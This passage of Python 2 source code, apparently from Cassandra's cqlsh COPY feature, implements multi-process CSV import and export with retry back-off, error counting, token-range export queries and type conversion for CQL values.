if self.header or self.num_read < self.skip_rows:
self.header = False # skip header or initial skip_rows rows
continue
rows.append(row)
return rows
class ImportProcessResult(object):
"""
An object sent from ImportProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, imported=0):
self.imported = imported
class FeedingProcessResult(object):
"""
An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, sent, reader):
self.sent = sent
self.num_sources = reader.num_sources
self.skip_rows = reader.skip_rows
class ImportTaskError(object):
"""
An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
"""
def __init__(self, name, msg, rows=None, attempts=1, final=True):
self.name = name
self.msg = msg
self.rows = rows if rows else []
self.attempts = attempts
self.final = final
def is_parse_error(self):
"""
We treat read and parse errors as unrecoverable and we have different global counters for giving up when
a maximum has been reached. We consider value and type errors as parse errors as well since they
are typically non-recoverable.
"""
name = self.name
return name.startswith('ValueError') or name.startswith('TypeError') or \
name.startswith('ParseError') or name.startswith('IndexError') or name.startswith('ReadError')
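# Illustrative sketch (not part of cqlsh): errors are classified purely by the
# exception class name carried in ImportTaskError.name, so a ValueError raised
# while parsing a row counts as a parse error and is never retried. The values
# below are made up.
def example_classify_import_error():
    err = ImportTaskError('ValueError', 'invalid literal for int()', rows=[['a', 'b']])
    return err.is_parse_error()  # True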
class ImportErrorHandler(object):
"""
A class for managing import errors
"""
def __init__(self, task):
self.shell = task.shell
self.options = task.options
self.max_attempts = self.options.copy['maxattempts']
self.max_parse_errors = self.options.copy['maxparseerrors']
self.max_insert_errors = self.options.copy['maxinserterrors']
self.err_file = self.options.copy['errfile']
self.parse_errors = 0
self.insert_errors = 0
self.num_rows_failed = 0
if os.path.isfile(self.err_file):
now = datetime.datetime.now()
old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
os.rename(self.err_file, old_err_file)
def max_exceeded(self):
if self.insert_errors > self.max_insert_errors >= 0:
self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
return True
if self.parse_errors > self.max_parse_errors >= 0:
self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
return True
return False
def add_failed_rows(self, rows):
self.num_rows_failed += len(rows)
with open(self.err_file, "a") as f:
writer = csv.writer(f, **self.options.dialect)
for row in rows:
writer.writerow(row)
def handle_error(self, err):
"""
Handle an error by printing the appropriate error message and incrementing the correct counter.
"""
shell = self.shell
if err.is_parse_error():
self.parse_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up without retries"
% (len(err.rows), err.name, err.msg))
else:
self.insert_errors += len(err.rows)
if not err.final:
shell.printerr("Failed to import %d rows: %s - %s, will retry later, attempt %d of %d"
% (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
else:
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up after %d attempts"
% (len(err.rows), err.name, err.msg, err.attempts))
class ImportTask(CopyTask):
"""
A class to import data from .csv by instantiating one or more processes
that work in parallel (ImportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
options = self.options
self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
self.receive_meter = RateMeter(log_fcn=self.printmsg,
update_interval=options.copy['reportfrequency'],
log_file=options.copy['ratefile'])
self.error_handler = ImportErrorHandler(self)
self.feeding_result = None
self.sent = 0
def make_params(self):
ret = CopyTask.make_params(self)
ret['skip_columns'] = self.skip_columns
ret['valid_columns'] = self.valid_columns
return ret
def validate_columns(self):
if not CopyTask.validate_columns(self):
return False
shell = self.shell
if not self.valid_columns:
shell.printerr("No valid column specified")
return False
for c in self.table_meta.primary_key:
if c.name not in self.valid_columns:
shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
return False
return True
def run(self):
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(self.options.unrecognized.keys()))
return
if not self.validate_columns():
return 0
columns = u"[" + u", ".join(self.valid_columns) + u"]"
self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
try:
params = self.make_params()
for i in range(self.num_processes - 1):
self.processes.append(ImportProcess(self.update_params(params, i)))
feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
self.outmsg.pipes[:-1], self.fname, self.options,
self.shell.conn if not IS_WINDOWS else None)
self.processes.append(feeder)
self.start_processes()
pr = profile_on() if PROFILE_ON else None
self.import_records()
if pr:
profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
except Exception, exc:
shell.printerr(unicode(exc))
if shell.debug:
traceback.print_exc()
return 0
finally:
self.close()
def send_stdin_rows(self):
"""
We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
directly (in the case of a file, the child process would close it). This is very primitive support
for STDIN import in that we won't start reporting progress until STDIN is fully consumed. I
think this is reasonable.
"""
shell = self.shell
self.printmsg("[Use . on a line by itself to end input]")
for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
self.outmsg.channels[-1].send(row)
self.outmsg.channels[-1].send(None)
if shell.tty:
print
def import_records(self):
"""
Keep running while there is data to receive or send and while all processes are running.
Send data (batches or retries) up to the max ingest rate. If we are waiting for data to
receive, check the incoming queue.
"""
if not self.fname:
self.send_stdin_rows()
while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
self.receive_results()
if self.error_handler.max_exceeded() or not self.all_processes_running():
break
if self.error_handler.num_rows_failed:
self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
(self.error_handler.num_rows_failed,
self.error_handler.err_file))
if not self.all_processes_running():
self.shell.printerr("{} child process(es) died unexpectedly, aborting"
.format(self.num_processes - self.num_live_processes()))
else:
if self.error_handler.max_exceeded():
self.processes[-1].terminate() # kill the feeder
for i, _ in enumerate(self.processes):
if self.processes[i].is_alive():
self.outmsg.channels[i].send(None)
# allow time for worker processes to exit cleanly
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and self.num_live_processes() > 0:
time.sleep(0.1)
attempts -= 1
self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
(self.receive_meter.get_total_records(),
self.feeding_result.num_sources if self.feeding_result else 0,
self.describe_interval(time.time() - self.time_start),
self.feeding_result.skip_rows if self.feeding_result else 0))
def all_processes_running(self):
return self.num_live_processes() == len(self.processes)
def receive_results(self):
"""
Receive results either from the worker processes, which send the number of rows imported,
or from the feeder process, which sends the total number of rows sent once it has finished sending them.
"""
aggregate_result = ImportProcessResult()
try:
for result in self.inmsg.recv(timeout=0.1):
if isinstance(result, ImportProcessResult):
aggregate_result.imported += result.imported
elif isinstance(result, ImportTaskError):
self.error_handler.handle_error(result)
elif isinstance(result, FeedingProcessResult):
self.feeding_result = result
else:
raise ValueError("Unexpected result: %s" % (result,))
finally:
self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
"""
A process that reads from import sources and sends chunks to worker processes.
"""
def __init__(self, inpipe, outpipe, worker_pipes, fname, options, parent_cluster):
mp.Process.__init__(self, target=self.run)
self.inpipe = inpipe
self.outpipe = outpipe
self.worker_pipes = worker_pipes
self.inmsg = None # must be created after forking on Windows
self.outmsg = None # must be created after forking on Windows
self.worker_channels = None # must be created after forking on Windows
self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
self.send_meter = RateMeter(log_fcn=None, update_interval=1)
self.ingest_rate = options.copy['ingestrate']
self.num_worker_processes = options.copy['numprocesses']
self.max_pending_chunks = options.copy['maxpendingchunks']
self.chunk_id = 0
self.parent_cluster = parent_cluster
def on_fork(self):
"""
Create the channels and release any parent connections after forking,
see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
if self.parent_cluster:
printdebugmsg("Closing parent cluster sockets")
self.parent_cluster.shutdown()
def run(self):
pr = profile_on() if PROFILE_ON else None
self.inner_run()
if pr:
profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
def inner_run(self):
"""
Send one batch per worker process to the queue unless we have exceeded the ingest rate.
In the export case we queue everything and let the worker processes throttle using max_requests,
here we throttle using the ingest rate in the feeding process because of memory usage concerns.
When finished we send back to the parent process the total number of rows sent.
"""
self.on_fork()
reader = self.reader
try:
reader.start()
except IOError, exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message))
channels = self.worker_channels
max_pending_chunks = self.max_pending_chunks
sent = 0
failed_attempts = 0
while not reader.exhausted:
channels_eligible = filter(lambda c: c.num_pending() < max_pending_chunks, channels)
if not channels_eligible:
failed_attempts += 1
delay = randint(1, pow(2, failed_attempts))
printdebugmsg("All workers busy, sleeping for %d second(s)" % (delay,))
time.sleep(delay)
continue
elif failed_attempts > 0:
failed_attempts = 0
for ch in channels_eligible:
try:
max_rows = self.ingest_rate - self.send_meter.current_record
if max_rows <= 0:
self.send_meter.maybe_update(sleep=False)
continue
rows = reader.read_rows(max_rows)
if rows:
sent += self.send_chunk(ch, rows)
except Exception, exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message))
if reader.exhausted:
break
# send back to the parent process the number of rows sent to the worker processes
self.outmsg.send(FeedingProcessResult(sent, reader))
# wait for poison pill (None)
self.inmsg.recv()
def send_chunk(self, ch, rows):
self.chunk_id += 1
num_rows = len(rows)
self.send_meter.increment(num_rows)
ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
return num_rows
def close(self):
self.reader.close()
self.inmsg.close()
self.outmsg.close()
for ch in self.worker_channels:
ch.close()
class ChildProcess(mp.Process):
"""
A child worker process; this holds the common functionality shared by ImportProcess and ExportProcess.
"""
def __init__(self, params, target):
mp.Process.__init__(self, target=target)
self.inpipe = params['inpipe']
self.outpipe = params['outpipe']
self.inmsg = None # must be initialized after fork on Windows
self.outmsg = None # must be initialized after fork on Windows
self.ks = params['ks']
self.table = params['table']
self.local_dc = params['local_dc']
self.columns = params['columns']
self.debug = params['debug']
self.port = params['port']
self.hostname = params['hostname']
self.connect_timeout = params['connect_timeout']
self.cql_version = params['cql_version']
self.auth_provider = params['auth_provider']
self.parent_cluster = params['parent_cluster']
self.ssl = params['ssl']
self.protocol_version = params['protocol_version']
self.config_file = params['config_file']
options = params['options']
self.date_time_format = options.copy['dtformats']
self.consistency_level = options.copy['consistencylevel']
self.decimal_sep = options.copy['decimalsep']
self.thousands_sep = options.copy['thousandssep']
self.boolean_styles = options.copy['boolstyle']
self.max_attempts = options.copy['maxattempts']
self.encoding = options.copy['encoding']
# Here we inject some failures for testing purposes, only if this environment variable is set
if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
else:
self.test_failures = None
def on_fork(self):
"""
Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
if self.parent_cluster:
printdebugmsg("Closing parent cluster sockets")
self.parent_cluster.shutdown()
def close(self):
printdebugmsg("Closing queues...")
self.inmsg.close()
self.outmsg.close()
class ExpBackoffRetryPolicy(RetryPolicy):
"""
A retry policy with exponential back-off for read timeouts and write timeouts
"""
def __init__(self, parent_process):
RetryPolicy.__init__(self)
self.max_attempts = parent_process.max_attempts
def on_read_timeout(self, query, consistency, required_responses,
received_responses, data_retrieved, retry_num):
return self._handle_timeout(consistency, retry_num)
def on_write_timeout(self, query, consistency, write_type,
required_responses, received_responses, retry_num):
return self._handle_timeout(consistency, retry_num)
def _handle_timeout(self, consistency, retry_num):
delay = self.backoff(retry_num)
if delay > 0:
printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
time.sleep(delay)
return self.RETRY, consistency
elif delay == 0:
printdebugmsg("Timeout received, retrying immediately")
return self.RETRY, consistency
else:
printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
return self.RETHROW, None
def backoff(self, retry_num):
"""
Perform exponential back-off up to a maximum number of times, where
this maximum is per query.
To back-off we should wait a random number of seconds
between 0 and 2^c - 1, where c is the number of total failures.
:return : the number of seconds to wait for, -1 if we should not retry
"""
if retry_num >= self.max_attempts:
return -1
delay = randint(0, pow(2, retry_num + 1) - 1)
return delay
class ExportSession(object):
"""
A class for connecting to a cluster and storing the number
of requests that this connection is processing. It wraps the methods
for executing a query asynchronously and for shutting down the
connection to the cluster.
"""
def __init__(self, cluster, export_process):
session = cluster.connect(export_process.ks)
session.row_factory = tuple_factory
session.default_fetch_size = export_process.options.copy['pagesize']
session.default_timeout = export_process.options.copy['pagetimeout']
printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
% (cluster.contact_points, session.default_fetch_size, session.default_timeout))
self.cluster = cluster
self.session = session
self.requests = 1
self.lock = threading.Lock()
self.consistency_level = export_process.consistency_level
def add_request(self):
with self.lock:
self.requests += 1
def complete_request(self):
with self.lock:
self.requests -= 1
def num_requests(self):
with self.lock:
return self.requests
def execute_async(self, query):
return self.session.execute_async(SimpleStatement(query, consistency_level=self.consistency_level))
def shutdown(self):
self.cluster.shutdown()
class ExportProcess(ChildProcess):
"""
A child worker process for the export task, ExportTask.
"""
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
options = params['options']
self.float_precision = options.copy['floatprecision']
self.double_precision = options.copy['doubleprecision']
self.nullval = options.copy['nullval']
self.max_requests = options.copy['maxrequests']
self.hosts_to_sessions = dict()
self.formatters = dict()
self.options = options
def run(self):
try:
self.inner_run()
finally:
self.close()
def inner_run(self):
"""
The parent sends us (range, info) on the inbound queue (inmsg)
in order to request us to process a range, for which we can
select any of the hosts in info, which also contains other information for this
range such as the number of attempts already performed. We can signal errors
on the outbound queue (outmsg) by sending (range, error) or
we can signal a global error by sending (None, error).
We terminate when the inbound queue is closed.
"""
self.on_fork()
while True:
if self.num_requests() > self.max_requests:
time.sleep(0.001) # 1 millisecond
continue
token_range, info = self.inmsg.recv()
self.start_request(token_range, info)
@staticmethod
def get_error_message(err, print_traceback=False):
if isinstance(err, str):
msg = err
elif isinstance(err, BaseException):
msg = "%s - %s" % (err.__class__.__name__, err)
if print_traceback and sys.exc_info()[1] == err:
traceback.print_exc()
else:
msg = unicode(err)
return msg
def report_error(self, err, token_range):
msg = self.get_error_message(err, print_traceback=self.debug)
printdebugmsg(msg)
self.send((token_range, Exception(msg)))
def send(self, response):
self.outmsg.send(response)
def start_request(self, token_range, info):
"""
Begin querying a range by executing an async query that
will later on invoke the callbacks attached in attach_callbacks.
"""
session = self.get_session(info['hosts'], token_range)
if session:
metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
future = session.execute_async(query)
self.attach_callbacks(token_range, future, session)
def num_requests(self):
return sum(session.num_requests() for session in self.hosts_to_sessions.values())
def get_session(self, hosts, token_range):
"""
We return a session connected to one of the hosts passed in, which are valid replicas for
the token range. We sort replicas by favouring those without any active requests yet or with the
smallest number of requests. If we fail to connect we report an error so that the token will
be retried again later.
:return: An ExportSession connected to the chosen host.
"""
# sorted replicas favouring those with no connections yet
hosts = sorted(hosts,
key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
errors = []
ret = None
for host in hosts:
try:
ret = self.connect(host)
except Exception, e:
errors.append(self.get_error_message(e))
if ret:
if errors:
printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
return ret
self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
token_range)
return None
def connect(self, host):
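# Reuse the existing session for this host if we already have one, otherwise build a new single-host cluster.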
if host in self.hosts_to_sessions:
session = self.hosts_to_sessions[host]
session.add_request()
return session
new_cluster = Cluster(
contact_points=(host,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
load_balancing_policy=WhiteListRoundRobinPolicy([host]),
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
session = ExportSession(new_cluster, self)
self.hosts_to_sessions[host] = session
return session
def attach_callbacks(self, token_range, future, session):
metadata = session.cluster.metadata
ks_meta = metadata.keyspaces[self.ks]
table_meta = ks_meta.tables[self.table]
cql_types = [CqlType(table_meta.columns[c].cql_type, ks_meta) for c in self.columns]
def result_callback(rows):
if future.has_more_pages:
future.start_fetching_next_page()
self.write_rows_to_csv(token_range, rows, cql_types)
else:
self.write_rows_to_csv(token_range, rows, cql_types)
self.send((None, None))
session.complete_request()
def err_callback(err):
self.report_error(err, token_range)
session.complete_request()
future.add_callbacks(callback=result_callback, errback=err_callback)
def write_rows_to_csv(self, token_range, rows, cql_types):
if not rows:
return # no rows in this range
try:
output = StringIO()
writer = csv.writer(output, **self.options.dialect)
for row in rows:
writer.writerow(map(self.format_value, row, cql_types))
data = (output.getvalue(), len(rows))
self.send((token_range, data))
output.close()
except Exception, e:
self.report_error(e, token_range)
def format_value(self, val, cqltype):
if val is None or val == EMPTY:
return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
formatter = self.formatters.get(cqltype, None)
if not formatter:
formatter = get_formatter(val, cqltype)
self.formatters[cqltype] = formatter
if not hasattr(cqltype, 'precision'):
cqltype.precision = self.double_precision if cqltype.type_name == 'double' else self.float_precision
return formatter(val, cqltype=cqltype,
encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
float_precision=cqltype.precision, nullval=self.nullval, quote=False,
decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
boolean_styles=self.boolean_styles)
def close(self):
ChildProcess.close(self)
for session in self.hosts_to_sessions.values():
session.shutdown()
def prepare_query(self, partition_key, token_range, attempts):
"""
Return the export query or a fake query with some failure injected.
"""
if self.test_failures:
return self.maybe_inject_failures(partition_key, token_range, attempts)
else:
return self.prepare_export_query(partition_key, token_range)
def maybe_inject_failures(self, partition_key, token_range, attempts):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
start_token, end_token = token_range
if not start_token or not end_token:
# exclude first and last ranges to make things simpler
return self.prepare_export_query(partition_key, token_range)
if 'failing_range' in self.test_failures:
failing_range = self.test_failures['failing_range']
if start_token >= failing_range['start'] and end_token <= failing_range['end']:
if attempts < failing_range['num_failures']:
return 'SELECT * from bad_table'
if 'exit_range' in self.test_failures:
exit_range = self.test_failures['exit_range']
if start_token >= exit_range['start'] and end_token <= exit_range['end']:
sys.exit(1)
return self.prepare_export_query(partition_key, token_range)
def prepare_export_query(self, partition_key, token_range):
"""
Return a query where we select all the data for this token range
"""
pk_cols = ", ".join(protect_names(col.name for col in partition_key))
columnlist = ', '.join(protect_names(self.columns))
start_token, end_token = token_range
query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
if start_token is not None or end_token is not None:
query += ' WHERE'
if start_token is not None:
query += ' token(%s) > %s' % (pk_cols, start_token)
if start_token is not None and end_token is not None:
query += ' AND'
if end_token is not None:
query += ' token(%s) <= %s' % (pk_cols, end_token)
return query
class ParseError(Exception):
""" We failed to parse an import record """
pass
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv, used by ImportProcess,
the parent.
"""
def __init__(self, parent, table_meta, statement=None):
self.ks = parent.ks
self.table = parent.table
self.columns = parent.valid_columns
self.nullval = parent.nullval
self.decimal_sep = parent.decimal_sep
self.thousands_sep = parent.thousands_sep
self.boolean_styles = parent.boolean_styles
self.date_time_format = parent.date_time_format.timestamp_format
self.debug = parent.debug
self.encoding = parent.encoding
self.table_meta = table_meta
self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
if statement is None:
self.use_prepared_statements = False
statement = self._get_primary_key_statement(parent, table_meta)
else:
self.use_prepared_statements = True
self.is_counter = parent.is_counter(table_meta)
self.proto_version = statement.protocol_version
# the cql types and converters for the prepared statement, either the full statement or only the primary keys
self.cqltypes = [c.type for c in statement.column_metadata]
self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
# the cql types for the entire statement, these are the same as the types above but
# only when using prepared statements
self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
# these functions are used for non-prepared statements to protect values with quotes if required
self.protectors = [self._get_protector(t) for t in self.coltypes]
def _get_protector(self, t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: unicode(protect_value(v), self.encoding)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
route the update query to the correct replicas. This is simply the easiest
way to discover the types of the partition columns; the prepared statement itself is never executed.
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(select_query)
def _get_converter(self, cql_type):
"""
Return a function that converts a string into a value that can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def convert(t, v):
v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
if v == self.nullval:
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
return bytearray.fromhex(v[2:])
def convert_text(v, **_):
return v
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == self.boolean_styles[0].lower() else False
def get_convert_integer_fcn(adapter=int):
"""
Return either a slow or a fast integer conversion function, depending on whether self.thousands_sep is set
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
Return either a slow or a fast decimal conversion function, depending on whether self.thousands_sep and self.decimal_sep are set
"""
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, '').replace(self.decimal_sep, '.'))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, '.'))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
Split val into a list of values on the separator, ignoring separators that
appear inside brackets or single quotes; the two outermost enclosing
characters are themselves skipped. We expect val to be at least
2 characters long (the two outer enclosing characters).
"""
ret = []
last = 1
level = 0
quote = False
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if c == '{' or c == '[' or c == '(':
level += 1
elif c == '}' or c == ']' or c == ')':
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
# this should match all possible CQL and CQLSH datetime formats
p = re.compile("(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" + # YYYY-MM-DD[( |'T')]
"(?:(\d{2}):(\d{2})(?::(\d{2})(?:\.(\d{1,6}))?))?" + # [HH:MM[:SS[.NNNNNN]]]
"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
try:
# in case of overflow COPY TO prints dates as milliseconds from the epoch, see
# deserialize_date_fallback_int in cqlsh.py
return int(val)
except ValueError:
raise ValueError("can't interpret %r as a date with format %s or as int" % (val,
self.date_time_format))
# https://docs.python.org/2/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
# convert sub-seconds (a number between 1 and 6 digits) to milliseconds
milliseconds = 0 if not m.group(7) else int(m.group(7)) * pow(10, 3 - len(m.group(7)))
if m.group(8):
offset = (int(m.group(9)) * 3600 + int(m.group(10)) * 60) * int(m.group(8) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return ((timegm(tval) + offset) * 1e3) + milliseconds
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return list(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
"""
We need to pass to BoundStatement.bind() a dict() because it calls iteritems(),
except we can't create a dict with another dict as the key, hence we use a class
that adds iteritems to a frozen set of tuples (which is how dicts are normally made
immutable in Python).
"""
class ImmutableDict(frozenset):
iteritems = frozenset.__iter__
return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
for v in [split('{%s}' % vv, sep=':') for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
"""
A user type is a dictionary except that we must convert each key into
an attribute, so we are using named tuples. It must also be hashable,
so we cannot use dictionaries. Maybe there is a way to instantiate ct
directly but I could not work it out.
"""
vals = [v for v in [split('{%s}' % vv, sep=':') for vv in split(val)]]
ret_type = namedtuple(ct.typename, [unprotect(v[0]) for v in vals])
return ret_type(*tuple(convert(t, v[1]) for t, v in zip(ct.subtypes, vals)))
def convert_single_subtype(val, ct=cql_type):
return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])
def convert_unknown(val, ct=cql_type):
if issubclass(ct, UserType):
return convert_user_type(val, ct=ct)
elif issubclass(ct, ReversedType):
return convert_single_subtype(val, ct=ct)
printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
return val
converters = {
'blob': convert_blob,
'decimal': get_convert_decimal_fcn(adapter=Decimal),
'uuid': convert_uuid,
'boolean': convert_bool,
'tinyint': get_convert_integer_fcn(),
'ascii': convert_text,
'float': get_convert_decimal_fcn(),
'double': get_convert_decimal_fcn(),
'bigint': get_convert_integer_fcn(adapter=long),
'int': get_convert_integer_fcn(),
'varint': get_convert_integer_fcn(),
'inet': convert_text,
'counter': get_convert_integer_fcn(adapter=long),
'timestamp': convert_datetime,
'timeuuid': convert_uuid,
'date': convert_date,
'smallint': get_convert_integer_fcn(),
'time': convert_time,
'text': convert_text,
'varchar': convert_text,
'list': convert_list,
'set': convert_set,
'map': convert_map,
'tuple': convert_tuple,
'frozen': convert_single_subtype,
}
return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
"""
Return the null value that is inserted for fields that are missing from csv files.
For counters we should return zero so that the counter value won't be incremented.
For everything else we return nulls, this means None if we use prepared statements
or "NULL" otherwise. Note that for counters we never use prepared statements, so we
only check is_counter when use_prepared_statements is false.
"""
return None if self.use_prepared_statements else ("0" if self.is_counter else "NULL")
def convert_row(self, row):
"""
Convert the row into a list of parsed values if using prepared statements, else simply apply the
protection functions to escape values with quotes when required. Also check on the row length and
make sure primary partition key values aren't missing.
"""
converters = self.converters if self.use_prepared_statements else self.protectors
if len(row) != len(converters):
raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))
for i in self.primary_key_indexes:
if row[i] == self.nullval:
raise ParseError(self.get_null_primary_key_message(i))
def convert(c, v):
try:
return c(v) if v != self.nullval else self.get_null_val()
except Exception, e:
if self.debug:
traceback.print_exc()
raise ParseError("Failed to parse %s : %s" % (val, e.message))
return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
message = "Cannot insert null value for primary key column '%s'." % (self.columns[idx],)
if self.nullval == '':
message += " If you want to insert empty strings, consider using" \
" the WITH NULL=<marker> option for COPY."
return message
def get_row_partition_key_values_fcn(self):
"""
Return a function to convert a row into a string composed of the partition key values serialized
and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
may have to convert the primary key values first, so we have two different serialize_value implementations.
We also return different functions depending on how many partition key indexes we have (single or multiple).
See also BoundStatement.routing_key.
"""
def serialize_value_prepared(n, v):
return self.cqltypes[n].serialize(v, self.proto_version)
def serialize_value_not_prepared(n, v):
return self.cqltypes[n].serialize(self.converters[n](v), self.proto_version)
partition_key_indexes = self.partition_key_indexes
serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared
def serialize_row_single(row):
return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])
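# For composite partition keys each serialized component is packed as a 2-byte big-endian length,
# the value itself and a trailing zero byte, matching the driver's composite routing-key format.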
def serialize_row_multiple(row):
pk_values = []
for i in partition_key_indexes:
val = serialize(i, row[i])
l = len(val)
pk_values.append(struct.pack(">H%dsB" % l, l, val, 0))
return b"".join(pk_values)
if len(partition_key_indexes) == 1:
return serialize_row_single
return serialize_row_multiple
class TokenMap(object):
"""
A wrapper around the metadata token map to speed things up by caching ring token *values* and
